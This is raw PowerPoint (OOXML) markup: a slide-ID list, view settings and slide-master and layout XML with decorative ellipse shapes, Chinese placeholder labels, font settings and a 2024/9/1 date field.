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notesSlides/notesSlide6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag5.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3" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId95"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="509" r:id="rId3"/>
    <p:sldId id="261" r:id="rId4"/>
    <p:sldId id="360" r:id="rId5"/>
    <p:sldId id="488" r:id="rId6"/>
    <p:sldId id="649" r:id="rId7"/>
    <p:sldId id="892" r:id="rId8"/>
    <p:sldId id="676" r:id="rId9"/>
    <p:sldId id="650" r:id="rId10"/>
    <p:sldId id="679" r:id="rId11"/>
    <p:sldId id="732" r:id="rId12"/>
    <p:sldId id="549" r:id="rId13"/>
    <p:sldId id="705" r:id="rId14"/>
    <p:sldId id="733" r:id="rId15"/>
    <p:sldId id="735" r:id="rId16"/>
    <p:sldId id="887" r:id="rId17"/>
    <p:sldId id="592" r:id="rId18"/>
    <p:sldId id="891" r:id="rId19"/>
    <p:sldId id="890" r:id="rId20"/>
    <p:sldId id="643" r:id="rId21"/>
    <p:sldId id="739" r:id="rId22"/>
    <p:sldId id="740" r:id="rId23"/>
    <p:sldId id="741" r:id="rId24"/>
    <p:sldId id="742" r:id="rId25"/>
    <p:sldId id="888" r:id="rId26"/>
    <p:sldId id="765" r:id="rId27"/>
    <p:sldId id="889" r:id="rId28"/>
    <p:sldId id="893" r:id="rId29"/>
    <p:sldId id="924" r:id="rId30"/>
    <p:sldId id="926" r:id="rId31"/>
    <p:sldId id="927" r:id="rId32"/>
    <p:sldId id="928" r:id="rId33"/>
    <p:sldId id="929" r:id="rId34"/>
    <p:sldId id="930" r:id="rId35"/>
    <p:sldId id="931" r:id="rId36"/>
    <p:sldId id="932" r:id="rId37"/>
    <p:sldId id="933" r:id="rId38"/>
    <p:sldId id="934" r:id="rId39"/>
    <p:sldId id="935" r:id="rId40"/>
    <p:sldId id="936" r:id="rId41"/>
    <p:sldId id="937" r:id="rId42"/>
    <p:sldId id="938" r:id="rId43"/>
    <p:sldId id="939" r:id="rId44"/>
    <p:sldId id="971" r:id="rId45"/>
    <p:sldId id="972" r:id="rId46"/>
    <p:sldId id="940" r:id="rId47"/>
    <p:sldId id="941" r:id="rId48"/>
    <p:sldId id="942" r:id="rId49"/>
    <p:sldId id="943" r:id="rId50"/>
    <p:sldId id="489" r:id="rId51"/>
    <p:sldId id="638" r:id="rId52"/>
    <p:sldId id="639" r:id="rId53"/>
    <p:sldId id="640" r:id="rId54"/>
    <p:sldId id="641" r:id="rId55"/>
    <p:sldId id="944" r:id="rId56"/>
    <p:sldId id="945" r:id="rId57"/>
    <p:sldId id="946" r:id="rId58"/>
    <p:sldId id="947" r:id="rId59"/>
    <p:sldId id="948" r:id="rId60"/>
    <p:sldId id="949" r:id="rId61"/>
    <p:sldId id="970" r:id="rId62"/>
    <p:sldId id="950" r:id="rId63"/>
    <p:sldId id="951" r:id="rId64"/>
    <p:sldId id="952" r:id="rId65"/>
    <p:sldId id="953" r:id="rId66"/>
    <p:sldId id="954" r:id="rId67"/>
    <p:sldId id="973" r:id="rId68"/>
    <p:sldId id="974" r:id="rId69"/>
    <p:sldId id="975" r:id="rId70"/>
    <p:sldId id="976" r:id="rId71"/>
    <p:sldId id="977" r:id="rId72"/>
    <p:sldId id="978" r:id="rId73"/>
    <p:sldId id="955" r:id="rId74"/>
    <p:sldId id="956" r:id="rId75"/>
    <p:sldId id="957" r:id="rId76"/>
    <p:sldId id="958" r:id="rId77"/>
    <p:sldId id="959" r:id="rId78"/>
    <p:sldId id="960" r:id="rId79"/>
    <p:sldId id="629" r:id="rId80"/>
    <p:sldId id="982" r:id="rId81"/>
    <p:sldId id="983" r:id="rId82"/>
    <p:sldId id="984" r:id="rId83"/>
    <p:sldId id="985" r:id="rId84"/>
    <p:sldId id="986" r:id="rId85"/>
    <p:sldId id="961" r:id="rId86"/>
    <p:sldId id="963" r:id="rId87"/>
    <p:sldId id="964" r:id="rId88"/>
    <p:sldId id="965" r:id="rId89"/>
    <p:sldId id="966" r:id="rId90"/>
    <p:sldId id="967" r:id="rId91"/>
    <p:sldId id="968" r:id="rId92"/>
    <p:sldId id="969" r:id="rId93"/>
    <p:sldId id="517" r:id="rId94"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="7104063" cy="10234613"/>
  <p:custDataLst>
    <p:tags r:id="rId9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u  Hai" initials="L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3300"/>
    <a:srgbClr val="FF0000"/>
    <a:srgbClr val="625CD4"/>
    <a:srgbClr val="666699"/>
    <a:srgbClr val="FF0066"/>
    <a:srgbClr val="339966"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="3A0CFC"/>
    <a:srgbClr val="5965D7"/>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793" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="145" d="100"/>
          <a:sy n="145" d="100"/>
        </p:scale>
        <p:origin x="7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notesMaster" Target="notesMasters/notesMaster1.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presProps" Target="presProps.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2024/9/1</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470415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66953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50399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4040594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21272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119451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812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93818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49236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53391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830706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698722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3434066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5739831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9723267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4080159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763482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2989244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6236220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8485488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8010178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481013" y="1279525"/>
            <a:ext cx="6140450" cy="34544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044251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87708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63614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2385074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5378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138164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968296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solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="组合 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1463675" y="5265738"/>
            <a:ext cx="9766300"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Rockwell" panose="02060503020205020403"/>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Rockwell" panose="02060503020205020403"/>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Rockwell" panose="02060503020205020403"/>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Rockwell" panose="02060503020205020403"/>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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2056" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="622300" y="87313"/>
            <a:ext cx="10831513" cy="4262437"/>
            <a:chOff x="324" y="391"/>
            <a:chExt cx="16051" cy="6503"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="椭圆 52"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4386" y="1973"/>
              <a:ext cx="2955" cy="2955"/>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 name="椭圆 1"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6923" y="2453"/>
              <a:ext cx="2955" cy="2952"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F3C301">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 name="椭圆 2"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2681" y="2308"/>
              <a:ext cx="3025" cy="3025"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00C3D9">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1800" b="1" strike="noStrike" noProof="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4988" y="1106"/>
              <a:ext cx="3022" cy="3022"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="028985">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1800" b="1" strike="noStrike" noProof="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="椭圆 4"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701" y="3221"/>
              <a:ext cx="3025" cy="3025"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E94E6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1800" b="1" strike="noStrike" noProof="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="椭圆 5"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8886" y="1843"/>
              <a:ext cx="3022" cy="3025"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DE6E00">
                <a:alpha val="4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1800" b="1" strike="noStrike" noProof="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="椭圆 6"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9231" y="943"/>
              <a:ext cx="520" cy="52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8" name="椭圆 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9321" y="6033"/>
              <a:ext cx="860" cy="86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9" name="椭圆 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3678" y="993"/>
              <a:ext cx="620" cy="620"/>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10" name="椭圆 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5363" y="5916"/>
              <a:ext cx="682" cy="680"/>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29" name="椭圆 28"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1823" y="2568"/>
              <a:ext cx="360" cy="36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0" name="椭圆 29"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1321" y="1203"/>
              <a:ext cx="145" cy="147"/>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31" name="椭圆 30"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="488" y="2388"/>
              <a:ext cx="147" cy="147"/>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2" name="椭圆 41"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3196" y="5811"/>
              <a:ext cx="622" cy="62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3" name="椭圆 42"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1591" y="4773"/>
              <a:ext cx="360" cy="357"/>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4" name="椭圆 43"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="323" y="3916"/>
              <a:ext cx="147" cy="145"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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5" name="椭圆 44"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="711" y="5721"/>
              <a:ext cx="147" cy="145"/>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6" name="椭圆 45"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="12663" y="3146"/>
              <a:ext cx="360" cy="360"/>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7" name="椭圆 46"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="12848" y="1323"/>
              <a:ext cx="147" cy="147"/>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8" name="椭圆 47"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="13896" y="2768"/>
              <a:ext cx="147" cy="147"/>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49" name="椭圆 48"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11373" y="5693"/>
              <a:ext cx="622" cy="620"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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0" name="椭圆 49"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="12541" y="4693"/>
              <a:ext cx="360" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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1" name="椭圆 50"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="14158" y="4248"/>
              <a:ext cx="147" cy="147"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="椭圆 51"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="13563" y="5591"/>
              <a:ext cx="202" cy="202"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2081" name="图片 3" descr="LOGO"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12541" y="390"/>
              <a:ext cx="3835" cy="1917"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162828" name="标题 162827"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464878" y="4677410"/>
            <a:ext cx="8535240" cy="588010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162830" name="日期占位符 162829"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320800" y="6248400"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" noProof="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" noProof="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162831" name="页脚占位符 162830"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="6248400"/>
            <a:ext cx="3862388" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="zh-CN" noProof="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162832" name="灯片编号占位符 162831"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9145588" y="6248400"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" noProof="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" noProof="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>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fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>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Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>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77138" y="260350"/>
            <a:ext cx="2496325" cy="561657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1488164" y="260350"/>
            <a:ext cx="7344260" cy="561657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lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>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Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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图表占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart"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lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base"/>
            <a:fld id="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2024/9/1</a:t>
            </a:fld>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Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" strike="noStrike" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>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showMasterPhAnim="0" type="title">
  <p:cSld name="标题幻灯片">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="组合 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1463675" y="5265738"/>
            <a:ext cx="9766300" cy="76200"/>
            <a:chOff x="2424953" y="1238297"/>
            <a:chExt cx="7322890" cy="76200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2424953" y="1238297"/>
              <a:ext cx="1463040" cy="76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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8284803" y="1238297"/>
              <a:ext cx="1463040" cy="76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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5351033" y="1238297"/>
              <a:ext cx="1463040" cy="76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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6814073" y="1238297"/>
              <a:ext cx="1463040" cy="76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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3887993" y="1238297"/>
              <a:ext cx="1463040" cy="76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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2056" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="622300" y="87313"/>
            <a:ext cx="10831513" cy="4262437"/>
            <a:chOff x="324" y="391"/>
            <a:chExt cx="16051" cy="6503"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="椭圆 52"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4386" y="1973"/>
              <a:ext cx="2955" cy="2955"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent3">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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="椭圆 1"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6923" y="2453"/>
              <a:ext cx="2955" cy="2952"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent3">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lt1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="椭圆 2"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2681" y="2308"/>
              <a:ext cx="3025" cy="3025"/>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1800" b="1" strike="noStrike" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4988" y="1106"/>
              <a:ext cx="3022" cy="3022"/>
            </a:xfrm>
